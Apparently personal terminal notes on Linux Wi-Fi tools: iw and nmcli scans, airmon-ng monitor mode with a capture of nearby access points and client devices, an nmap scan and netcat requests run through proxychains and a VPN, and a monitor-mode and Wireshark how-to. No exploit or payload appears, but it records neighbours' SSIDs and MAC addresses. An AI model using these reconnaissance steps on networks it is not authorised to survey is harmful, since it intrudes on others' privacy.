<= 1, #{ AP, P2P-client, P2P-GO } <= 1, #{ P2P-device } <= 1, total <= 3, #channels <= 2 HT Capability overrides: * MCS: ff ff ff ff ff ff ff ff ff ff * maximum A-MSDU length * supported channel width * short GI for 40 MHz * max A-MPDU length exponent * min MPDU start spacing Device supports TX status socket option. Device supports HT-IBSS. Device supports SAE with AUTHENTICATE command Device supports low priority scan. Device supports scan flush. Device supports per-vif TX power setting P2P GO supports CT window setting P2P GO supports opportunistic powersave setting Driver supports full state transitions for AP/GO clients Driver supports a userspace MPM Driver/device bandwidth changes during BSS lifetime (AP/GO mode) Device adds DS IE to probe requests Device can update TPC Report IE Device supports static SMPS Device supports dynamic SMPS Device supports WMM-AC admission (TSPECs) Device supports configuring vdev MAC-addr on create. Device supports randomizing MAC-addr in scans. Device supports randomizing MAC-addr in sched scans. Device supports randomizing MAC-addr in net-detect scans. max # scan plans: 2 max scan plan interval: 65535 max scan plan iterations: 254 Supported TX frame types: * IBSS: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * managed: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * AP: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * AP/VLAN: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * mesh point: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * P2P-client: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * P2P-GO: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * P2P-device: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 Supported RX frame types: * IBSS: 0x40 0xb0 0xc0 0xd0 * managed: 0x40 0xb0 0xd0 * AP: 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0 * AP/VLAN: 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0 * mesh point: 0xb0 0xc0 0xd0 * P2P-client: 0x40 0xd0 * P2P-GO: 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0 * P2P-device: 0x40 0xd0 Supported extended features: * [ VHT_IBSS ]: VHT-IBSS * [ RRM ]: RRM * [ MU_MIMO_AIR_SNIFFER ]: MU-MIMO sniffer * [ SCAN_START_TIME ]: scan start timestamp * [ BSS_PARENT_TSF ]: BSS last beacon/probe TSF * [ FILS_STA ]: STA FILS (Fast Initial Link Setup) * [ CONTROL_PORT_OVER_NL80211 ]: control port over nl80211 * [ TXQS ]: FQ-CoDel-enabled intermediate TXQs * [ ENABLE_FTM_RESPONDER ]: enable FTM (Fine Time Measurement) responder * [ CONTROL_PORT_NO_PREAUTH ]: disable pre-auth over nl80211 control port support * [ PROTECTED_TWT ]: protected Target Wake Time (TWT) support * [ DEL_IBSS_STA ]: deletion of IBSS station support * [ SCAN_FREQ_KHZ ]: scan on kHz frequency support * [ CONTROL_PORT_OVER_NL80211_TX_STATUS ]: tx status for nl80211 control port support $ sudo iw wlan0 scan | egrep "^BSS|SSID" BSS 88:dc:96:47:d0:af(on wlan0) -- associated SSID: CCCCPrivate BSS 88:dc:96:49:b3:8e(on wlan0) SSID: CCCC_Tech_Booth BSS 88:dc:96:49:b3:82(on wlan0) SSID: CCCCPrivate BSS 8a:dc:96:49:b3:82(on wlan0) SSID: CCCCPublic BSS 88:dc:96:47:d0:ae(on wlan0) SSID: CCCCPrivate BSS 8a:dc:96:47:d0:ae(on wlan0) SSID: CCCCPublic BSS 88:dc:96:49:b3:88(on wlan0) SSID: CCCCPrivate BSS 8a:dc:96:49:b3:88(on wlan0) SSID: CCCCPublic BSS e8:9f:80:43:55:05(on wlan0) SSID: CCCCPrivate * SSID List BSS ee:9f:80:43:55:05(on wlan0) SSID: * SSID List BSS e8:9f:80:43:55:06(on wlan0) SSID: CCCCPrivate * SSID List BSS 68:39:43:98:7a:9f(on wlan0) SSID: HLD_1987A9F BSS 88:dc:96:49:b3:8f(on wlan0) SSID: CCCC_Tech_Booth BSS 88:dc:96:49:b3:83(on wlan0) SSID: CCCCPrivate BSS 8a:dc:96:49:b3:83(on wlan0) SSID: CCCCPublic -------- $ nmcli -f in-use,ssid,chan,bars,security,bssid dev wifi list IN-USE SSID CHAN BARS SECURITY BSSID CCCC_Tech_Booth 1 ▂▄▆█ WPA2 88:DC:96:49:B3:8E CCCCPrivate 6 ▂▄▆█ WPA2 88:DC:96:49:B3:82 CCCCPrivate 6 ▂▄▆█ WPA2 88:DC:96:47:D0:AE CCCCPublic 6 ▂▄▆█ -- 8A:DC:96:49:B3:82 CCCCPublic 6 ▂▄▆█ -- 8A:DC:96:47:D0:AE CCCC_Tech_Booth 60 ▂▄▆_ WPA2 88:DC:96:49:B3:8F CCCCPrivate 60 ▂▄▆_ WPA2 88:DC:96:49:B3:83 CCCCPublic 60 ▂▄▆_ -- 8A:DC:96:49:B3:83 * CCCCPrivate 44 ▂▄▆_ WPA2 88:DC:96:47:D0:AF HLD_1987A9F 165 ▂▄▆_ WPA1 WPA2 68:39:43:98:7A:9F CCCCPrivate 6 ▂▄__ WPA2 E8:9F:80:43:55:05 -- 6 ▂▄__ WPA2 EE:9F:80:43:55:05 CCCCPrivate 36 ▂___ WPA2 E8:9F:80:43:55:06 CCCCPrivate 6 ▂___ WPA2 88:DC:96:49:B3:88 CCCCPublic 6 ▂___ -- 8A:DC:96:49:B3:88 CCCCPrivate 161 ▂___ WPA2 E8:9F:80:43:55:07 $ sudo journalctl --system --no-pager | grep -i "eth0" Restore mysql database from bkup. mysql -u [user] -p [database_name] < [filename].sql $ sudo rovclock --help Radeon overclock 0.6e by Hasw (hasw@hasw.net) Found ATI card on 08:00, device id: 0x1636 I/O base address: 0x1000 Video BIOS signature not found. Invalid reference clock from BIOS: 0.0 MHz rovclock: invalid option -- '-' Usage: rovclock -i (info) -c [MHz] (set core clock) -m [MHz] (set mem clock) -x [kHz] (xtal frequency, default 2700) -t [name]:[val] (set memory timings) $ sudo rovclock -i Radeon overclock 0.6e by Hasw (hasw@hasw.net) Found ATI card on 08:00, device id: 0x1636 I/O base address: 0x1000 Video BIOS signature not found. Invalid reference clock from BIOS: 0.0 MHz Memory size: 0 kB Memory channels: 0, CD,CH only: 0 tRcdRD: 5 tRcdWR: 1 tRP: 3 tRAS: 6 tRRD: 1 tR2W-CL: 1 tWR: 1 tW2R: 0 tW2Rsb: 0 tR2R: 1 tRFC: 13 tWL(0.5): 1 tCAS: 0 tCMD: 0 tSTR: 0 zsh: floating point exception sudo rovclock -i Working with setting up an openvpn connection with a random nordvpn proxy using my account, and then running network commands through. This is just some testing of the process. $ proxychains sudo nmap -sT -p 80 ont.by [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-21 12:38 EDT Nmap scan report for ont.by (178.124.138.31) Host is up (0.043s latency). PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds proxychains nc -vv -n ont.by 80 GET / HTTP 1.0 sudo open /etc/openvpn/ovpn_udp/za123.nordvpn.com.udp.ovpn ┌──(parth㉿Parth)-[/etc/openvpn] $ sudo systemctl stop nordvpnd $ sudo openvpn /etc/openvpn/ovpn_udp/za123.nordvpn.com.udp.ovpn ┌──(parth㉿Parth)-[/etc/openvpn] $ nc -vv perl.com 80 Ncat: Version 7.92 ( https://nmap.org/ncat ) NCAT DEBUG: Using system default trusted CA certificates and those in /etc/ssl/certs/ca-certificates.crt. libnsock nsock_iod_new2(): nsock_iod_new (IOD #1) libnsock nsock_connect_tcp(): TCP connection requested to 151.101.130.132:80 (IOD #1) EID 8 libnsock nsock_trace_handler_callback(): Callback: CONNECT SUCCESS for EID 8 [151.101.130.132:80] Ncat: Connected to 151.101.130.132:80. libnsock nsock_iod_new2(): nsock_iod_new (IOD #2) libnsock nsock_read(): Read request from IOD #1 [151.101.130.132:80] (timeout: -1ms) EID 18 libnsock nsock_readbytes(): Read request for 0 bytes from IOD #2 [peer unspecified] EID 26 GET / HTTP/1.0 libnsock nsock_trace_handler_callback(): Callback: READ SUCCESS for EID 26 [peer unspecified] (15 bytes): GET / HTTP/1.0. libnsock nsock_write(): Write request for 15 bytes to IOD #1 EID 35 [151.101.130.132:80] libnsock nsock_trace_handler_callback(): Callback: WRITE SUCCESS for EID 35 [151.101.130.132:80] libnsock nsock_readbytes(): Read request for 0 bytes from IOD #2 [peer unspecified] EID 42 libnsock nsock_trace_handler_callback(): Callback: READ SUCCESS for EID 42 [peer unspecified] (1 bytes): . libnsock nsock_write(): Write request for 1 bytes to IOD #1 EID 51 [151.101.130.132:80] libnsock nsock_trace_handler_callback(): Callback: WRITE SUCCESS for EID 51 [151.101.130.132:80] libnsock nsock_readbytes(): Read request for 0 bytes from IOD #2 [peer unspecified] EID 58 libnsock nsock_trace_handler_callback(): Callback: READ SUCCESS for EID 18 [151.101.130.132:80] (496 bytes) HTTP/1.1 500 Domain Not Found Server: Varnish Retry-After: 0 content-type: text/html Cache-Control: private, no-cache X-Served-By: cache-lcy19265-LCY Content-Length: 221 Accept-Ranges: bytes Date: Sat, 21 May 2022 16:59:25 GMT Via: 1.1 varnish Connection: close $ sudo airmon-ng check kill $ sudo airmon-ng start wlan0 $ ifconfig eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether c0:25:a5:16:53:2d txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 45 base 0xf000 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 1000 (Local Loopback) RX packets 4303 bytes 230791 (225.3 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 4303 bytes 230791 (225.3 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0mon: flags=867<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,ALLMULTI> mtu 1500 unspec B0-7D-64-E7-BA-A3-00-32-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC) RX packets 9164 bytes 4629039 (4.4 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 $ sudo airmon-ng stop wlan0mon PHY Interface Driver Chipset phy0 wlan0mon iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a) (mac80211 station mode vif enabled on [phy0]wlan0) (mac80211 monitor mode vif disabled for [phy0]wlan0mon) $ sudo ifconfig wlan0 up List all services named netwo* to identify networking.service (which might be 'exited') $ sudo systemctl status netwo* Now I can check the status 'exited' $ sudo systemctl status networking.service ● networking.service - Raise network interfaces Loaded: loaded (/lib/systemd/system/networking.service; enabled; vendor preset: enabled) Active: active (exited) since Sat 2022-05-14 16:13:53 EDT; 1s ago Docs: man:interfaces(5) Process: 13762 ExecStart=/sbin/ifup -a --read-environment (code=exited, status=0/SUCCESS) Main PID: 13762 (code=exited, status=0/SUCCESS) CPU: 40ms May 14 16:13:53 Parth systemd[1]: Starting Raise network interfaces... May 14 16:13:53 Parth systemd[1]: Finished Raise network interfaces. $ sudo airmon-ng start wlan0 Found 2 processes that could cause trouble. Kill them using 'airmon-ng check kill' before putting the card in monitor mode, they will interfere by changing channels CH 12 ][ Elapsed: 4 mins ][ 2022-05-14 16:08 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID C8:52:61:97:05:B0 -39 392 214 0 6 195 WPA2 CCMP PSK ATTFJ4Br3A BC:A5:11:99:2E:38 -53 261 0 0 6 360 WPA2 CCMP PSK ATTFJ4Br3A_2GEXT 94:8F:CF:75:BE:00 -64 210 1462 0 1 195 WPA2 CCMP PSK ATTB2f6CTA C8:C7:50:F5:06:E0 -76 250 28 0 6 195 WPA2 CCMP PSK peasants 86:EA:ED:4F:DA:81 -79 164 0 0 1 65 WPA2 CCMP PSK <length: 0> F4:17:B8:45:0D:62 -74 157 89 0 11 130 WPA2 CCMP PSK ATTB2f6CTA A2:17:B8:45:0D:63 -80 113 87 0 11 130 WPA2 CCMP PSK <length: 9> 24:94:CB:8C:AA:76 -87 124 15 0 1 195 WPA2 CCMP PSK ARRIS-02DD 30:E1:71:B2:B8:66 -84 167 0 0 6 65 WPA2 CCMP PSK DIRECT-65-HP ENVY 4510 7C:0C:F6:07:C7:71 -88 38 2 0 1 65 WPA2 CCMP PSK Dash-5481 CC:AB:2C:88:75:04 -90 86 37 0 11 260 WPA2 CCMP PSK ATTNYvm2Zc 38:A0:67:82:D2:44 -90 15 7 0 1 260 WPA2 CCMP PSK <length: 0> BA:2C:A0:8B:15:63 -90 131 0 0 6 65 OPN NewThermostat_8B1563 2C:99:24:61:7F:D9 -91 3 1 0 11 195 WPA2 CCMP PSK ARRIS-7FDB 0C:84:DC:B9:13:58 -78 0 0 0 -1 -1 <length: 0> B0:EE:7B:AF:1E:E5 -90 14 1 0 6 130 WPA2 CCMP PSK <length: 22> 2C:30:33:E7:45:7D -89 21 0 0 1 130 WPA2 CCMP PSK belkin.e80_2GEXT BSSID STATION PWR Rate Lost Frames Notes Probes (not associated) A2:CC:C9:6A:79:1A -27 0 - 1 0 13 (not associated) A4:8D:3B:0F:7D:DD -52 0 - 1 22 191 Private.net (not associated) FC:52:8D:76:F6:2C -83 0 - 1 0 29 NETGEAR (not associated) 00:57:C1:F9:4F:DD -88 0 - 1 0 9 (not associated) 8A:7F:AE:95:4D:FF -90 0 - 1 0 1 (not associated) 2C:30:33:E7:45:7D -93 0 - 1 0 30 belkin.e80 C8:52:61:97:05:B0 00:13:46:E4:48:61 -69 48e- 1 0 39 ATTFJ4Br3A 94:8F:CF:75:BE:00 84:EA:ED:4F:DA:81 -79 24e-24e 0 1320 C8:C7:50:F5:06:E0 BC:A8:A6:C4:E5:32 -76 24e- 6e 0 23 2C:99:24:61:7F:D9 54:E0:19:F3:D9:41 -90 0 - 1e 0 3 Quitting... Examples of WiFi commands; $ sudo nmcli dev wifi 2 ⨯ IN-USE BSSID SSID MODE CHAN RATE SIGNAL BARS SECURITY C8:52:61:97:05:B0 ATTFJ4Br3A Infra 6 195 Mbit/s 100 ▂▄▆█ WPA2 BC:A5:11:99:2E:38 ATTFJ4Br3A_2GEXT Infra 6 130 Mbit/s 100 ▂▄▆█ WPA2 * C6:52:61:97:05:B3 ATTFJ4Br3A Infra 153 540 Mbit/s 77 ▂▄▆_ WPA2 C8:52:61:97:05:B3 -- Infra 153 540 Mbit/s 65 ▂▄▆_ WPA2 C8:C7:50:F5:06:E0 peasants Infra 11 195 Mbit/s 54 ▂▄__ WPA2 94:8F:CF:75:BE:00 ATTB2f6CTA Infra 1 195 Mbit/s 52 ▂▄__ WPA2 86:8F:CF:75:BE:03 ATTB2f6CTA Infra 36 540 Mbit/s 27 ▂___ WPA2 94:8F:CF:75:BE:03 -- Infra 36 540 Mbit/s 27 ▂___ WPA2 86:EA:ED:4F:DA:81 -- Infra 1 65 Mbit/s 19 ▂___ WPA2 IN-USE BSSID SSID MODE CHAN RATE SIGNAL BARS SECURITY C8:52:61:97:05:B0 ATTFJ4Br3A Infra 6 195 Mbit/s 100 ▂▄▆█ WPA2 C6:52:61:97:05:B3 ATTFJ4Br3A Infra 153 540 Mbit/s 87 ▂▄▆█ WPA2 BC:A5:11:99:2E:38 ATTFJ4Br3A_2GEXT Infra 6 130 Mbit/s 82 ▂▄▆█ WPA2 DA:31:34:68:77:AF -- Infra 153 130 Mbit/s 69 ▂▄▆_ WPA2 94:8F:CF:75:BE:00 ATTB2f6CTA Infra 1 195 Mbit/s 55 ▂▄__ WPA2 BC:A5:11:99:2E:3A ATTFJ4Br3A_5GEXT Infra 153 270 Mbit/s 55 ▂▄__ WPA2 F4:17:B8:45:0D:62 ATTB2f6CTA Infra 11 130 Mbit/s 35 ▂▄__ WPA2 86:8F:CF:75:BE:03 ATTB2f6CTA Infra 36 540 Mbit/s 24 ▂___ WPA2 24:94:CB:8C:AA:76 ARRIS-02DD Infra 1 195 Mbit/s 22 ▂___ WPA2 $ sudo nmcli connection show ATTFJ4Br3A (Long output) $ sudo iwlist wlan0 scan wlan0 Scan completed : Cell 01 - Address: BC:A5:11:99:2E:38 Channel:6 Frequency:2.437 GHz (Channel 6) Quality=57/70 Signal level=-53 dBm Encryption key:on ESSID:"ATTFJ4Br3A_2GEXT" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 9 Mb/s; 12 Mb/s; 18 Mb/s Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000085943501c01 Extra: Last beacon: 1216ms ago IE: Unknown: 0010415454464A34427233415F3247455854 IE: Unknown: 010882848B960C121824 IE: Unknown: 030106 IE: Unknown: 0706555320010B1E IE: Unknown: 2A0104 IE: Unknown: 32043048606C IE: Unknown: 2D1AAD0903FFFF000000000000000000000100000000000000000000 IE: Unknown: 3D1606000400000000000000000000000000000000000000 IE: Unknown: 4A0E14000A002C01C800140005001900 IE: Unknown: 7F0801000F0200000040 IE: Unknown: BF0CB2498933FAFF0000FAFF0000 IE: Unknown: C005000000FCFF IE: Unknown: DD180050F2020101800003A4000027A4000042435E0062322F00 IE: Unknown: DD0900037F01010000FF7F IE: Unknown: DD870050F204104A0001101044000102103B000103104700108765432 19ABCDEF01234BCA511992E38102100044E5447521023000845583631353076321024000256321042000D344C5 6363942355941303044361054000800060050F204000110110015455836313530763228576972656C657373204 150291008000220081049000600372A000120 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK $ iw dev phy#1 Interface wlan1 ifindex 4 wdev 0x100000001 addr 00:c0:ca:b1:5c:55 ssid ATTFJ4Br3A type managed txpower 20.00 dBm phy#0 Unnamed/non-netdev interface wdev 0x2 addr b0:7d:64:e7:ba:a3 type P2P-device txpower 0.00 dBm Interface wlan0 ifindex 3 wdev 0x1 addr fa:7d:f0:56:ce:7e type managed txpower 22.00 dBm multicast TXQ: qsz-byt qsz-pkt flows drops marks overlmt hashcol tx-bytes tx-packets 0 0 0 0 0 0 0 0 0 $ ip route show default via 192.168.1.254 dev wlan1 proto dhcp src 192.168.1.241 metric 600 192.168.1.0/24 dev wlan1 proto kernel scope link src 192.168.1.241 metric 600 $ sudo ip link show wlan1 4: wlan1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 2312 qdisc mq state UP mode DORMANT group default qlen 1000 link/ether 00:c0:ca:b1:5c:55 brd ff:ff:ff:ff:ff:ff $ iw wlan1 link Connected to c6:52:61:97:05:b3 (on wlan1) SSID: ATTFJ4Br3A freq: 5765 signal: -51 dBm tx bitrate: 434.0 MBit/s bss flags: short-slot-time dtim period: 0 beacon int: 100 $ nmcli -f ALL dev wifi NAME SSID SSID-HEX BSSID MODE CHAN FREQ RATE SIGNAL BARS SECURITY WPA-FLAGS RSN-FLAGS DEVICE ACTIVE IN-USE DBUS-PATH AP[1] ATTFJ4Br3A 415454464A3442723341 C8:52:61:97:05:B0 Infra 6 2437 MHz 195 Mbit/s 100 ▂▄▆█ WPA2 (none) pair_ccmp group_ccmp psk wlan1 no /org/freedesktop/NetworkManager/AccessPoint/145 AP[2] ATTFJ4Br3A_2GEXT 415454464A34427233415F3247455854 BC:A5:11:99:2E:38 Infra 6 2437 MHz 130 Mbit/s 100 ▂▄▆█ WPA2 (none) pair_ccmp group_ccmp psk wlan1 no /org/freedesktop/NetworkManager/AccessPoint/144 AP[3] ATTFJ4Br3A 415454464A3442723341 C6:52:61:97:05:B3 Infra 153 5765 MHz 540 Mbit/s 77 ▂▄▆_ WPA2 (none) pair_ccmp group_ccmp psk wlan1 yes * /org/freedesktop/NetworkManager/AccessPoint/71 AP[4] ATTB2f6CTA 41545442326636435441 94:8F:CF:75:BE:00 Infra 1 2412 MHz 195 Mbit/s 70 ▂▄▆_ WPA2 (none) pair_ccmp group_ccmp psk wlan1 no /org/freedesktop/NetworkManager/AccessPoint/147 AP[5] -- -- DA:31:34:68:77:AF Infra 153 5765 MHz 130 Mbit/s 70 ▂▄▆_ WPA2 (none) pair_ccmp group_ccmp psk wlan1 no /org/freedesktop/NetworkManager/AccessPoint/143 AP[6] peasants 70656173616E7473 C8:C7:50:F5:06:E0 Infra 11 2462 MHz 195 Mbit/s 57 ▂▄▆_ WPA2 (none) pair_ccmp group_ccmp psk wlan1 no /org/freedesktop/NetworkManager/AccessPoint/146 AP[7] ATTB2f6CTA 41545442326636435441 F4:17:B8:45:0D:62 Infra 11 2462 MHz 130 Mbit/s 50 ▂▄__ WPA2 (none) pair_ccmp group_ccmp psk wlan1 no /org/freedesktop/NetworkManager/AccessPoint/149 AP[8] -- -- 94:8F:CF:75:BE:03 Infra 36 5180 MHz 540 Mbit/s 29 ▂___ WPA2 (none) pair_ccmp group_ccmp psk wlan1 no /org/freedesktop/NetworkManager/AccessPoint/150 AP[9] ATTB2f6CTA 41545442326636435441 86:8F:CF:75:BE:03 Infra 36 5180 MHz 540 Mbit/s 27 ▂___ WPA2 (none) pair_ccmp group_ccmp psk wlan1 no /org/freedesktop/NetworkManager/AccessPoint/151 AP[10] -- -- 86:EA:ED:4F:DA:81 Infra 1 2412 MHz 65 Mbit/s 19 ▂___ WPA2 (none) pair_ccmp group_ccmp psk wlan1 no /org/freedesktop/NetworkManager/AccessPoint/148 NAME SSID SSID-HEX BSSID MODE CHAN FREQ RATE SIGNAL BARS SECURITY WPA-FLAGS RSN-FLAGS DEVICE ACTIVE IN-USE DBUS-PATH AP[1] ATTFJ4Br3A 415454464A3442723341 C8:52:61:97:05:B0 Infra 6 2437 MHz 195 Mbit/s 100 ▂▄▆█ WPA2 (none) pair_ccmp group_ccmp psk wlan0 no /org/freedesktop/NetworkManager/AccessPoint/30 AP[2] ATTFJ4Br3A 415454464A3442723341 C6:52:61:97:05:B3 Infra 153 5765 MHz 540 Mbit/s 82 ▂▄▆█ WPA2 (none) pair_ccmp group_ccmp psk wlan0 no /org/freedesktop/NetworkManager/AccessPoint/2 AP[3] ATTFJ4Br3A_2GEXT 415454464A34427233415F3247455854 BC:A5:11:99:2E:38 Infra 6 2437 MHz 130 Mbit/s 80 ▂▄▆_ WPA2 (none) pair_ccmp group_ccmp psk wlan0 no /org/freedesktop/NetworkManager/AccessPoint/31 AP[4] -- -- C8:52:61:97:05:B3 Infra 153 5765 MHz 540 Mbit/s 74 ▂▄▆_ WPA2 (none) pair_ccmp group_ccmp psk wlan0 no /org/freedesktop/NetworkManager/AccessPoint/140 AP[5] ATTFJ4Br3A_5GEXT 415454464A34427233415F3547455854 BC:A5:11:99:2E:3A Infra 153 5765 MHz 270 Mbit/s 57 ▂▄▆_ WPA2 (none) pair_ccmp group_ccmp psk wlan0 no /org/freedesktop/NetworkManager/AccessPoint/29 AP[6] ATTB2f6CTA 41545442326636435441 94:8F:CF:75:BE:00 Infra 1 2412 MHz 195 Mbit/s 47 ▂▄__ WPA2 (none) pair_ccmp group_ccmp psk wlan0 no /org/freedesktop/NetworkManager/AccessPoint/32 AP[7] peasants 70656173616E7473 C8:C7:50:F5:06:E0 Infra 11 2462 MHz 195 Mbit/s 29 ▂___ WPA2 (none) pair_ccmp group_ccmp psk wlan0 no /org/freedesktop/NetworkManager/AccessPoint/97 AP[8] ATTB2f6CTA 41545442326636435441 F4:17:B8:45:0D:62 Infra 11 2462 MHz 130 Mbit/s 24 ▂___ WPA2 (none) pair_ccmp group_ccmp psk wlan0 no /org/freedesktop/NetworkManager/AccessPoint/122 AP[9] ATTB2f6CTA 41545442326636435441 86:8F:CF:75:BE:03 Infra 36 5180 MHz 540 Mbit/s 15 ▂___ WPA2 (none) pair_ccmp group_ccmp psk wlan0 no /org/freedesktop/NetworkManager/AccessPoint/38 $ nmcli -m multiline -f ALL dev wifi NAME: AP[1] SSID: ATTFJ4Br3A SSID-HEX: 415454464A3442723341 BSSID: C8:52:61:97:05:B0 MODE: Infra CHAN: 6 FREQ: 2437 MHz RATE: 195 Mbit/s SIGNAL: 100 BARS: ▂▄▆█ SECURITY: WPA2 WPA-FLAGS: (none) RSN-FLAGS: pair_ccmp group_ccmp psk DEVICE: wlan1 ACTIVE: no IN-USE: DBUS-PATH: /org/freedesktop/NetworkManager/AccessPoint/145 NAME: AP[2] SSID: ATTFJ4Br3A_2GEXT SSID-HEX: 415454464A34427233415F3247455854 BSSID: BC:A5:11:99:2E:38 MODE: Infra CHAN: 6 FREQ: 2437 MHz RATE: 130 Mbit/s SIGNAL: 100 BARS: ▂▄▆█ SECURITY: WPA2 WPA-FLAGS: (none) RSN-FLAGS: pair_ccmp group_ccmp psk DEVICE: wlan1 ACTIVE: no IN-USE: DBUS-PATH: /org/freedesktop/NetworkManager/AccessPoint/144 NAME: AP[3] SSID: ATTFJ4Br3A SSID-HEX: 415454464A3442723341 BSSID: C6:52:61:97:05:B3 MODE: Infra CHAN: 153 FREQ: 5765 MHz RATE: 540 Mbit/s SIGNAL: 77 BARS: ▂▄▆_ SECURITY: WPA2 WPA-FLAGS: (none) RSN-FLAGS: pair_ccmp group_ccmp psk DEVICE: wlan1 ACTIVE: yes IN-USE: * DBUS-PATH: /org/freedesktop/NetworkManager/AccessPoint/71 NAME: AP[4] Now I switch to a longer antenna, check to see if there is a difference in the numbers above. $ iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=22 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:on wlan1 IEEE 802.11AC ESSID:"ATTFJ4Br3A" Nickname:"<WIFI@REALTEK>" Mode:Managed Frequency:5.765 GHz Access Point: C6:52:61:97:05:B3 Bit Rate:434 Mb/s Sensitivity:0/0 Retry:off RTS thr:off Fragment thr:off Power Management:off Link Quality=81/100 Signal level=-50 dBm Noise level=0 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 $ ifconfig eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether c0:25:a5:16:53:2d txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 45 base 0xf000 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 1000 (Local Loopback) RX packets 104 bytes 8879 (8.6 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 104 bytes 8879 (8.6 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether 9a:80:4e:f6:74:05 txqueuelen 1000 (Ethernet) RX packets 4752 bytes 2476317 (2.3 MiB) RX errors 0 dropped 1001 overruns 0 frame 0 TX packets 998 bytes 160486 (156.7 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2312 inet 192.168.1.241 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 2600:1700:43f0:d60::27 prefixlen 128 scopeid 0x0<global> inet6 fe80::2c0:caff:feb1:5c55 prefixlen 64 scopeid 0x20<link> inet6 2600:1700:43f0:d60:ae69:4033:ea03:23f9 prefixlen 64 scopeid 0x0<global> inet6 2600:1700:43f0:d60:2c0:caff:feb1:5c55 prefixlen 64 scopeid 0x0<global> ether 00:c0:ca:b1:5c:55 txqueuelen 1000 (Ethernet) RX packets 19 bytes 3335 (3.2 KiB) RX errors 0 dropped 6 overruns 0 frame 0 TX packets 24 bytes 3016 (2.9 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 To check if your Linux kernel driver supports monitor mode, use the following command. iw list | grep -i "supported interface modes" -A 20 | grep "* monitor" Lets create a new interface called mon0, delete the existing interface and finally bring up the new interface up. Don’t forget to replace the interface name wlp2s0 with yours. # Create new interface called mon0 sudo iw phy phy0 interface add mon0 type monitor sudo iw dev wlan0 del # Replace wlan0 with your interface name sudo ip link set mon0 up # Bring up the interface mon0 up You can check if your wireless interface mon0 is created successfully in monitor mode or not, using the following command. iw dev Obviously you are going to capture wireless traffic for certain channel. For ex: channel 44, 60, 112 etc. We need to set the respective channel frequency to be captured by mon0. You can find the frequency of certain channel from following table. Channel Frequency 1 2412 6 2437 11 2462 36 5180 40 5200 44 5220 48 5240 52 5260 56 5280 60 5300 64 5320 100 5500 104 5520 108 5540 112 5560 116 5580 120 5600 124 5620 128 5640 132 5660 136 5680 140 5700 144 5720 149 5745 Now, set the channel frequency using the following command sudo iw dev mon0 set freq <Channel Freq> Wireshark is a packet analyzer. We can select the specific interface, in this case mon0, and then start capturing. Run the following command in terminal to install wireshark. sudo apt install wireshark sudo usermod -a -G wireshark $USER 